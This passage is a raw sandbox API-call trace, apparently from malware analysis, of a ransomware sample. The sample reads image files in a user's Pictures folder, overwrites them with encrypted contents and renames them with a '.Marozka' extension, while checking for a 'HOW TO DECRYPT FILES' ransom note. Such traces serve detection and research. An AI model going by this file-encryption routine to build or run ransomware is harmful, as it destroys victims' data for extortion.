lpBuffer="C:\\Users\\FD1HVy\\Pictures\\pFqA3X17QpaPo2DQPbEz.bmp", lpFilePart=0x0) returned 0x31 [0056.215] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\pFqA3X17QpaPo2DQPbEz.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\pFqA3X17QpaPo2DQPbEz.bmp.Marozka", lpFilePart=0x0) returned 0x39 [0056.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0056.215] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\pFqA3X17QpaPo2DQPbEz.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\pfqa3x17qpapo2dqpbez.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc999ced0, ftCreationTime.dwHighDateTime=0x1d4d303, ftLastAccessTime.dwLowDateTime=0x353d58c0, ftLastAccessTime.dwHighDateTime=0x1d4d334, ftLastWriteTime.dwLowDateTime=0xe43be490, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x15d90)) returned 1 [0056.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0056.215] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\pFqA3X17QpaPo2DQPbEz.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\pfqa3x17qpapo2dqpbez.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\pFqA3X17QpaPo2DQPbEz.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\pfqa3x17qpapo2dqpbez.bmp.marozka")) returned 1 [0056.216] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\sA8T.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\sA8T.bmp", lpFilePart=0x0) returned 0x21 [0056.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0056.216] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\sA8T.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sa8t.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.216] GetFileType (hFile=0x2e0) returned 0x1 [0056.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0056.217] GetFileType (hFile=0x2e0) returned 0x1 [0056.217] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x162cd [0056.217] ReadFile (in: hFile=0x2e0, lpBuffer=0x376c240, nNumberOfBytesToRead=0x162cd, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x376c240*, lpNumberOfBytesRead=0x5beabc*=0x162cd, lpOverlapped=0x0) returned 1 [0056.217] CloseHandle (hObject=0x2e0) returned 1 [0056.287] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0056.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0056.287] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0056.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0056.287] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\sA8T.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\sA8T.bmp", lpFilePart=0x0) returned 0x21 [0056.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0056.287] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\sA8T.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sa8t.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.289] GetFileType (hFile=0x2e0) returned 0x1 [0056.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0056.289] GetFileType (hFile=0x2e0) returned 0x1 [0056.289] WriteFile (in: hFile=0x2e0, lpBuffer=0x37db090*, nNumberOfBytesToWrite=0x162d0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x37db090*, lpNumberOfBytesWritten=0x5beab0*=0x162d0, lpOverlapped=0x0) returned 1 [0056.292] CloseHandle (hObject=0x2e0) returned 1 [0056.294] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\sA8T.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\sA8T.bmp", lpFilePart=0x0) returned 0x21 [0056.294] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\sA8T.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\sA8T.bmp.Marozka", lpFilePart=0x0) returned 0x29 [0056.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0056.295] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\sA8T.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sa8t.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49078260, ftCreationTime.dwHighDateTime=0x1d4d517, ftLastAccessTime.dwLowDateTime=0xba27c560, ftLastAccessTime.dwHighDateTime=0x1d4c804, ftLastWriteTime.dwLowDateTime=0xe447d04f, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x162d0)) returned 1 [0056.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0056.295] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\sA8T.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sa8t.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\sA8T.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\sa8t.bmp.marozka")) returned 1 [0056.295] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\t-OnPrh5TUNytB2.jpg", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\t-OnPrh5TUNytB2.jpg", lpFilePart=0x0) returned 0x2c [0056.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0056.296] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\t-OnPrh5TUNytB2.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\t-onprh5tunytb2.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.404] GetFileType (hFile=0x2e0) returned 0x1 [0056.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0056.404] GetFileType (hFile=0x2e0) returned 0x1 [0056.404] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x76b5 [0056.404] ReadFile (in: hFile=0x2e0, lpBuffer=0x268cc0c, nNumberOfBytesToRead=0x76b5, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x268cc0c*, lpNumberOfBytesRead=0x5beabc*=0x76b5, lpOverlapped=0x0) returned 1 [0056.404] CloseHandle (hObject=0x2e0) returned 1 [0056.420] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0056.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0056.420] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0056.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0056.421] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\t-OnPrh5TUNytB2.jpg", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\t-OnPrh5TUNytB2.jpg", lpFilePart=0x0) returned 0x2c [0056.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0056.421] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\t-OnPrh5TUNytB2.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\t-onprh5tunytb2.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.486] GetFileType (hFile=0x2e0) returned 0x1 [0056.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0056.486] GetFileType (hFile=0x2e0) returned 0x1 [0056.486] WriteFile (in: hFile=0x2e0, lpBuffer=0x26febb8*, nNumberOfBytesToWrite=0x76c0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x26febb8*, lpNumberOfBytesWritten=0x5beab0*=0x76c0, lpOverlapped=0x0) returned 1 [0056.487] CloseHandle (hObject=0x2e0) returned 1 [0056.488] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\t-OnPrh5TUNytB2.jpg", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\t-OnPrh5TUNytB2.jpg", lpFilePart=0x0) returned 0x2c [0056.489] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\t-OnPrh5TUNytB2.jpg.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\t-OnPrh5TUNytB2.jpg.Marozka", lpFilePart=0x0) returned 0x34 [0056.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0056.489] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\t-OnPrh5TUNytB2.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\t-onprh5tunytb2.jpg"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd35e5680, ftCreationTime.dwHighDateTime=0x1d4c9ac, ftLastAccessTime.dwLowDateTime=0x5257cef0, ftLastAccessTime.dwHighDateTime=0x1d4cc85, ftLastWriteTime.dwLowDateTime=0xe466cf11, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x76c0)) returned 1 [0056.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0056.489] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\t-OnPrh5TUNytB2.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\t-onprh5tunytb2.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\t-OnPrh5TUNytB2.jpg.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\t-onprh5tunytb2.jpg.marozka")) returned 1 [0056.489] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\uADPgcwCW3cI Db.jpg", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\uADPgcwCW3cI Db.jpg", lpFilePart=0x0) returned 0x2c [0056.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0056.489] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\uADPgcwCW3cI Db.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\uadpgcwcw3ci db.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.489] GetFileType (hFile=0x2e0) returned 0x1 [0056.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0056.490] GetFileType (hFile=0x2e0) returned 0x1 [0056.490] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x14c2c [0056.490] ReadFile (in: hFile=0x2e0, lpBuffer=0x37f1380, nNumberOfBytesToRead=0x14c2c, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x37f1380*, lpNumberOfBytesRead=0x5beabc*=0x14c2c, lpOverlapped=0x0) returned 1 [0056.490] CloseHandle (hObject=0x2e0) returned 1 [0056.505] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0056.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0056.506] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0056.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0056.506] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\uADPgcwCW3cI Db.jpg", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\uADPgcwCW3cI Db.jpg", lpFilePart=0x0) returned 0x2c [0056.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0056.506] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\uADPgcwCW3cI Db.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\uadpgcwcw3ci db.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.507] GetFileType (hFile=0x2e0) returned 0x1 [0056.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0056.507] GetFileType (hFile=0x2e0) returned 0x1 [0056.507] WriteFile (in: hFile=0x2e0, lpBuffer=0x38590a8*, nNumberOfBytesToWrite=0x14c30, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x38590a8*, lpNumberOfBytesWritten=0x5beab0*=0x14c30, lpOverlapped=0x0) returned 1 [0056.509] CloseHandle (hObject=0x2e0) returned 1 [0056.511] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\uADPgcwCW3cI Db.jpg", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\uADPgcwCW3cI Db.jpg", lpFilePart=0x0) returned 0x2c [0056.511] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\uADPgcwCW3cI Db.jpg.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\uADPgcwCW3cI Db.jpg.Marozka", lpFilePart=0x0) returned 0x34 [0056.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0056.511] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\uADPgcwCW3cI Db.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\uadpgcwcw3ci db.jpg"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a5c90, ftCreationTime.dwHighDateTime=0x1d4ce20, ftLastAccessTime.dwLowDateTime=0x4408b120, ftLastAccessTime.dwHighDateTime=0x1d4c6a9, ftLastWriteTime.dwLowDateTime=0xe4693176, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x14c30)) returned 1 [0056.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0056.512] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\uADPgcwCW3cI Db.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\uadpgcwcw3ci db.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\uADPgcwCW3cI Db.jpg.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\uadpgcwcw3ci db.jpg.marozka")) returned 1 [0056.512] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\UC8G6.jpg", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\UC8G6.jpg", lpFilePart=0x0) returned 0x22 [0056.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0056.512] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\UC8G6.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\uc8g6.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.512] GetFileType (hFile=0x2e0) returned 0x1 [0056.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0056.513] GetFileType (hFile=0x2e0) returned 0x1 [0056.513] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x972f [0056.513] ReadFile (in: hFile=0x2e0, lpBuffer=0x2753a08, nNumberOfBytesToRead=0x972f, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x2753a08*, lpNumberOfBytesRead=0x5beabc*=0x972f, lpOverlapped=0x0) returned 1 [0056.513] CloseHandle (hObject=0x2e0) returned 1 [0056.528] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0056.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0056.528] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0056.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0056.528] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\UC8G6.jpg", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\UC8G6.jpg", lpFilePart=0x0) returned 0x22 [0056.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0056.528] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\UC8G6.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\uc8g6.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.529] GetFileType (hFile=0x2e0) returned 0x1 [0056.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0056.529] GetFileType (hFile=0x2e0) returned 0x1 [0056.529] WriteFile (in: hFile=0x2e0, lpBuffer=0x27cfbe4*, nNumberOfBytesToWrite=0x9730, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x27cfbe4*, lpNumberOfBytesWritten=0x5beab0*=0x9730, lpOverlapped=0x0) returned 1 [0056.578] CloseHandle (hObject=0x2e0) returned 1 [0056.579] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\UC8G6.jpg", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\UC8G6.jpg", lpFilePart=0x0) returned 0x22 [0056.580] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\UC8G6.jpg.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\UC8G6.jpg.Marozka", lpFilePart=0x0) returned 0x2a [0056.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0056.580] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\UC8G6.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\uc8g6.jpg"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc356e150, ftCreationTime.dwHighDateTime=0x1d4cd47, ftLastAccessTime.dwLowDateTime=0x3bcf9c20, ftLastAccessTime.dwHighDateTime=0x1d4d479, ftLastWriteTime.dwLowDateTime=0xe4751ccd, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x9730)) returned 1 [0056.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0056.580] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\UC8G6.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\uc8g6.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\UC8G6.jpg.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\uc8g6.jpg.marozka")) returned 1 [0056.580] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\VRYDD.jpg", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\VRYDD.jpg", lpFilePart=0x0) returned 0x22 [0056.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0056.581] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\VRYDD.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\vrydd.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.581] GetFileType (hFile=0x2e0) returned 0x1 [0056.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0056.581] GetFileType (hFile=0x2e0) returned 0x1 [0056.581] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x9c8e [0056.581] ReadFile (in: hFile=0x2e0, lpBuffer=0x27d979c, nNumberOfBytesToRead=0x9c8e, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27d979c*, lpNumberOfBytesRead=0x5beabc*=0x9c8e, lpOverlapped=0x0) returned 1 [0056.581] CloseHandle (hObject=0x2e0) returned 1 [0056.602] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0056.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0056.602] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0056.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0056.603] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\VRYDD.jpg", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\VRYDD.jpg", lpFilePart=0x0) returned 0x22 [0056.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0056.603] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\VRYDD.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\vrydd.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.604] GetFileType (hFile=0x2e0) returned 0x1 [0056.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0056.604] GetFileType (hFile=0x2e0) returned 0x1 [0056.604] WriteFile (in: hFile=0x2e0, lpBuffer=0x2669d7c*, 